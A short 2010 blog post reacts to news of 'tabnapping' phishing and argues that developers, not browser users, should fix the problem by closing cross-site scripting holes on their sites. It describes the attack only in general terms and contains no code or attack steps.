Friday, May 28, 2010

Tabnapping! Nasty, AVOIDABLE stuff!

Have you read the news about the newest type of phishing attack? "Tabnapping". Nasty, nasty stuff. Sneaky, and believable, and many standard "no script" sort of protections don't stop it.

I've now read several articles on it and I am once again floored at the "what's the band-aid" mentality, and the "how to browse safely" focus of everyone!

Analogy: there is a machine making gaping holes in your street's sidewalk. You inform people about the latest hole. You analyze the hole and how to walk around it. You explain how to avoid it in the dark or see new holes as they are created. But no one thinks about stopping the machine that is making the darn holes!! If the machine can't be turned off then at least blockade your street from the machine. If everyone did that then holes would be much less frequent and dangerous!

Read the article mentioned above. Any of you pick up the key clue on stopping it?? I've been harping on it. Come on, you should know this one by now! Yup, XSS! Tabnapping works by a script on a friendly site's page! How'd it get there? Hmmmmm...SOME DEVELOPER LEFT THE DOOR OPEN ON THE FRIENDLY SITE!

This attack (and many others) can be greatly slowed by developers closing their XSS holes.

Is your site going to be the next headline of poor programming? No more excuses! Close the XSS holes!

No comments:

Post a Comment